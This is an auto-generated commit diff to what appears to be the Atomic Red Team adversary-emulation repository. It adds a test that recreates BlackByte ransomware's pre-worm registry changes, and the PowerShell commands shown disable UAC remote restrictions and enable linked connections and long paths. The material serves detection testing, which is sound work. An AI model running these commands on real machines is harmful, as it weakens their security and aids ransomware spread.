Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-03-07 17:34:07 +00:00
parent 03c3400af9
commit 682d8d732b
6 changed files with 73 additions and 0 deletions
@@ -474,6 +474,7 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -306,6 +306,7 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -749,6 +749,7 @@
  - Atomic Test #5: Javascript in registry [windows]
  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -518,6 +518,7 @@
  - Atomic Test #5: Javascript in registry [windows]
  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -31591,6 +31591,30 @@ defense-evasion:
          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
        name: command_prompt
        elevation_required: true
+    - name: BlackByte Ransomware Registry Changes - Powershell
+      auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+      description: |
+        This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+        The steps are as follows:
+        <ol>
+            <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+            <li>2. Enable OS to share network connections between different privilege levels</li>
+            <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+        </ol>
+        The registry keys and their respective values will be created upon successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+        cleanup_command: |
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+          Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+        name: powershell
+        elevation_required: true
  T1601:
    technique:
      external_references:
@@ -24,6 +24,8 @@ The Registry of a remote system may be modified to aid in execution of files as

 - [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)

+- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
+

 <br/>

@@ -291,4 +293,47 @@ reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled



+<br/>
+<br/>
+
+## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
+This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+The steps are as follows:
+<ol>
+    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+    <li>2. Enable OS to share network connections between different privilege levels</li>
+    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+</ol>
+The registry keys and their respective values will be created upon successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0b79c06f-c788-44a2-8630-d69051f1123d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+```
+
+
+
+
+
 <br/>